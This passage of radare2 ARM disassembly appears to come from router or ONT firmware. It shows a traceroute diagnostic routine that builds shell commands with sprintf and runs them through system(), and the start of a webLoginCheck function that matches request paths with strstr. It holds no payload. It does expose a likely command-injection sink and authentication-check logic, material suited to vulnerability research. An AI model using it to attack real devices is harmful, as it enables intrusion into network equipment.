| 0x0001aa18 e0109fe5 ldr r1, str.echo____traceroute__n__I__s________s ; [0x1ab00:4]=0x26238 str.echo____traceroute__n__I__s________s
| 0x0001aa1c 0400a0e1 mov r0, r4
| 0x0001aa20 50bbffeb bl sym.imp.sprintf ; int sprintf(char *s,
| 0x0001aa24 0400a0e1 mov r0, r4
| 0x0001aa28 88baffeb bl sym.imp.system ; int system(const char *string)
| 0x0001aa2c 78309fe5 ldr r3, aav.0x00028718 ; [0x1aaac:4]=0x28718 aav.0x00028718
| 0x0001aa30 98104be2 sub r1, fp, 0x98
| 0x0001aa34 240093e5 ldr r0, [r3, 0x24]
| 0x0001aa38 c0baffeb bl sym.imp.VOS_Host2Str
| 0x0001aa3c c0109fe5 ldr r1, str.traceroute__n__I__s__s__s_1___s_2__1 ; [0x1ab04:4]=0x26260 str.traceroute__n__I__s__s__s_1___s_2__1
| 0x0001aa40 70209fe5 ldr r2, aav.0x000286b8 ; [0x1aab8:4]=0x286b8 aav.0x000286b8
| 0x0001aa44 0030a0e1 mov r3, r0
| 0x0001aa48 0400a0e1 mov r0, r4
| ; JMP XREF from 0x0001a8a4 (aav.0x0001a684 + 544)
| 0x0001aa4c 00508de5 str r5, [sp]
| 0x0001aa50 44bbffeb bl sym.imp.sprintf ; int sprintf(char *s,
,==< 0x0001aa54 030000ea b 0x1aa68
|| ; JMP XREF from 0x0001a870 (aav.0x0001a684 + 492)
|| ; JMP XREF from 0x0001aa0c (aav.0x0001a684 + 904)
|`-> 0x0001aa58 0520a0e1 mov r2, r5
| 0x0001aa5c 0400a0e1 mov r0, r4
| 0x0001aa60 a0109fe5 ldr r1, str.echo__No_traceroute_test.__________s ; [0x1ab08:4]=0x26198 str.echo__No_traceroute_test.__________s
| 0x0001aa64 3fbbffeb bl sym.imp.sprintf ; int sprintf(char *s,
| ; JMP XREF from 0x0001aa54 (aav.0x0001a684 + 976)
`--> 0x0001aa68 0400a0e1 mov r0, r4
0x0001aa6c 664f4be2 sub r4, fp, 0x198
0x0001aa70 76baffeb bl sym.imp.system ; int system(const char *string)
0x0001aa74 90109fe5 ldr r1, str.echo__ping_traceroute_finished.________s ; [0x1ab0c:4]=0x26288 str.echo__ping_traceroute_finished.________s
0x0001aa78 24209fe5 ldr r2, str.tmp_.web_diag.txt ; [0x1aaa4:4]=0x26020 str.tmp_.web_diag.txt
0x0001aa7c 0400a0e1 mov r0, r4
0x0001aa80 38bbffeb bl sym.imp.sprintf ; int sprintf(char *s,
0x0001aa84 0400a0e1 mov r0, r4
; JMP XREF from 0x0001a950 (aav.0x0001a684 + 716)
0x0001aa88 70baffeb bl sym.imp.system ; int system(const char *string)
0x0001aa8c 28309fe5 ldr r3, aav.0x00028670 ; [0x1aabc:4]=0x28670 aav.0x00028670
0x0001aa90 0220a0e3 mov r2, 2 ; 2
0x0001aa94 002083e5 str r2, [r3]
; JMP XREF from 0x0001a798 (aav.0x0001a684 + 276)
0x0001aa98 0000a0e3 mov r0, 0
0x0001aa9c 24d04be2 sub sp, fp, 0x24
0x0001aaa0 f0ad9de8 ldm sp, {r4, r5, r6, r7, r8, sl, fp, sp, pc}
; XREFS: DATA 0x0001a6a8 DATA 0x0001a784 DATA 0x0001a7d0 DATA 0x0001a86c DATA 0x0001a8c4 DATA 0x0001a940 DATA 0x0001a960 DATA 0x0001aa08
; XREFS: DATA 0x0001aa78
0x0001aaa4 .dword 0x00026020 ; str.tmp_.web_diag.txt
; DATA XREF from 0x0001a6b0 (aav.0x0001a684 + 44)
0x0001aaa8 .dword 0x0002866c ; aav.0x0002866c
; XREFS: DATA 0x0001a6b4 DATA 0x0001a808 DATA 0x0001a82c DATA 0x0001a878 DATA 0x0001a898 DATA 0x0001a9b0 DATA 0x0001aa2c
0x0001aaac .dword 0x00028718 ; aav.0x00028718
; DATA XREF from 0x0001a6d0 (aav.0x0001a684 + 76)
0x0001aab0 .dword 0x00026038 ; str.echo__Your_select_wan_ipv6_state_is_not_up_______s
; XREFS: DATA 0x0001a6d8 DATA 0x0001a734 DATA 0x0001a780 DATA 0x0001a7c8 DATA 0x0001a80c DATA 0x0001a87c DATA 0x0001a8d4 DATA 0x0001a918
; XREFS: DATA 0x0001a93c DATA 0x0001a958 DATA 0x0001a998 DATA 0x0001aa10
0x0001aab4 .dword 0x00028678 ; aav.0x00028678
; XREFS: DATA 0x0001a71c DATA 0x0001a7c4 DATA 0x0001a830 DATA 0x0001a89c DATA 0x0001a92c DATA 0x0001a954 DATA 0x0001a9c8 DATA 0x0001aa40
0x0001aab8 .dword 0x000286b8 ; aav.0x000286b8
; DATA XREF from 0x0001a770 (aav.0x0001a684 + 236)
; DATA XREF from 0x0001a8bc (aav.0x0001a684 + 568)
; DATA XREF from 0x0001aa8c (aav.0x0001a684 + 1032)
0x0001aabc .dword 0x00028670 ; aav.0x00028670
[0x00009870]> pd @ sym.webLoginCheck
/ (fcn) sym.webLoginCheck 1024
| sym.webLoginCheck ();
| ; var int local_48h @ fp-0x48
| ; var int local_44h @ fp-0x44
| ; var int local_40h @ fp-0x40
| ; var int local_3ch @ fp-0x3c
| ; var int local_0h @ sp+0x0
| ; var int local_4h @ sp+0x4
| ; var int local_8h @ sp+0x8
| ; var int local_ch @ sp+0xc
| ; UNKNOWN XREF from 0x000087e4 (section_end..hash + 900)
| 0x0000a2a8 0dc0a0e1 mov ip, sp
| 0x0000a2ac f0d92de9 push {r4, r5, r6, r7, r8, fp, ip, lr, pc}
| 0x0000a2b0 04b04ce2 sub fp, ip, 4
| 0x0000a2b4 3cd04de2 sub sp, sp, 0x3c ; '<'
| 0x0000a2b8 984090e5 ldr r4, [r0, 0x98]
| 0x0000a2bc 0060a0e1 mov r6, r0
| 0x0000a2c0 e0139fe5 ldr r1, str.style ; [0xa6a8:4]=0x20358 str.style
| 0x0000a2c4 0400a0e1 mov r0, r4
| 0x0000a2c8 3efdffeb bl sym.imp.strstr ; char*strstr(char *s1, const char *s2)
| 0x0000a2cc 000050e3 cmp r0, 0
| ,=< 0x0000a2d0 f000001a bne 0xa698
| | 0x0000a2d4 0400a0e1 mov r0, r4
| | 0x0000a2d8 cc139fe5 ldr r1, aav.0x00020360 ; [0xa6ac:4]=0x20360 aav.0x00020360
| | 0x0000a2dc 39fdffeb bl sym.imp.strstr ; char*strstr(char *s1, const char *s2)
| | 0x0000a2e0 000050e3 cmp r0, 0
| ,==< 0x0000a2e4 eb00001a bne 0xa698
| || 0x0000a2e8 0400a0e1 mov r0, r4
| || 0x0000a2ec bc139fe5 ldr r1, str.images ; [0xa6b0:4]=0x20368 str.images
| || 0x0000a2f0 34fdffeb bl sym.imp.strstr ; char*strstr(char *s1, const char *s2)
| || 0x0000a2f4 000050e3 cmp r0, 0
| ,===< 0x0000a2f8 e600001a bne 0xa698
| ||| 0x0000a2fc 0400a0e1 mov r0, r4
| ||| 0x0000a300 ac139fe5 ldr r1, str.ote ; [0xa6b4:4]=0x20370 str.ote
| ||| 0x0000a304 2ffdffeb bl sym.imp.strstr ; char*strstr(char *s1, const char *s2)
| ||| 0x0000a308 005050e2 subs r5, r0, 0
| ,====< 0x0000a30c 0500000a beq 0xa328
| |||| 0x0000a310 a0139fe5 ldr r1, [0x0000a6b8] ; [0xa6b8:4]=0xd005d
| |||| 0x0000a314 0120a0e3 mov r2, 1 ; 1
| |||| 0x0000a318 24304be2 sub r3, fp, 0x24
| |||| 0x0000a31c 042023e5 str r2, [r3, -4]!
| |||| 0x0000a320 022082e0 add r2, r2, r2
| ,=====< 0x0000a324 080000ea b 0xa34c
| ||||| ; JMP XREF from 0x0000a30c (sym.webLoginCheck)
| |`----> 0x0000a328 0400a0e1 mov r0, r4
| | ||| 0x0000a32c 88139fe5 ldr r1, str.otd ; [0xa6bc:4]=0x20378 str.otd
| | ||| 0x0000a330 24fdffeb bl sym.imp.strstr ; char*strstr(char *s1, const char *s2)
| | ||| 0x0000a334 000050e3 cmp r0, 0
| |,====< 0x0000a338 0800000a beq 0xa360
| ||||| 0x0000a33c 74139fe5 ldr r1, [0x0000a6b8] ; [0xa6b8:4]=0xd005d
| ||||| 0x0000a340 24304be2 sub r3, fp, 0x24
| ||||| 0x0000a344 045023e5 str r5, [r3, -4]!
| ||||| 0x0000a348 0220a0e3 mov r2, 2 ; 2
| ||||| ; JMP XREF from 0x0000a324 (sym.webLoginCheck)
| `-----> 0x0000a34c 04c0a0e3 mov ip, 4 ; 4
| |||| 0x0000a350 090aa0e3 mov r0, 0x9000
| |||| 0x0000a354 00c08de5 str ip, [sp]
| |||| 0x0000a358 42fcffeb bl sym.imp.VOS_SendMsg
| ,=====< 0x0000a35c c90000ea b 0xa688
| ||||| ; JMP XREF from 0x0000a338 (sym.webLoginCheck)
| |`----> 0x0000a360 0400a0e1 mov r0, r4
| | ||| 0x0000a364 54139fe5 ldr r1, str.tore ; [0xa6c0:4]=0x20380 str.tore
| | ||| 0x0000a368 16fdffeb bl sym.imp.strstr ; char*strstr(char *s1, const char *s2)
| | ||| 0x0000a36c 000050e3 cmp r0, 0
| |,====< 0x0000a370 0800000a beq 0xa398
| ||||| 0x0000a374 48039fe5 ldr r0, str.tmp_ont_need_reg ; [0xa6c4:4]=0x20388 str.tmp_ont_need_reg
| ||||| 0x0000a378 48139fe5 ldr r1, aav.0x00022650 ; [0xa6c8:4]=0x22650 aav.0x00022650
| ||||| 0x0000a37c 99fcffeb bl sym.imp.fopen ; file*fopen(const char *filename,
| ||||| 0x0000a380 005050e2 subs r5, r0, 0
| ,======< 0x0000a384 bf00000a beq 0xa688
| |||||| 0x0000a388 3c139fe5 ldr r1, aav.0x00024970 ; [0xa6cc:4]=0x24970 aav.0x00024970
| |||||| 0x0000a38c 48404be2 sub r4, fp, 0x48
| |||||| 0x0000a390 0400a0e1 mov r0, r4
| ,=======< 0x0000a394 0c0000ea b 0xa3cc
| ||||||| ; JMP XREF from 0x0000a370 (sym.webLoginCheck)
| |||`----> 0x0000a398 0400a0e1 mov r0, r4
| ||| ||| 0x0000a39c 2c139fe5 ldr r1, str.tord ; [0xa6d0:4]=0x203a0 str.tord
| ||| ||| 0x0000a3a0 08fdffeb bl sym.imp.strstr ; char*strstr(char *s1, const char *s2)
| ||| ||| 0x0000a3a4 007050e2 subs r7, r0, 0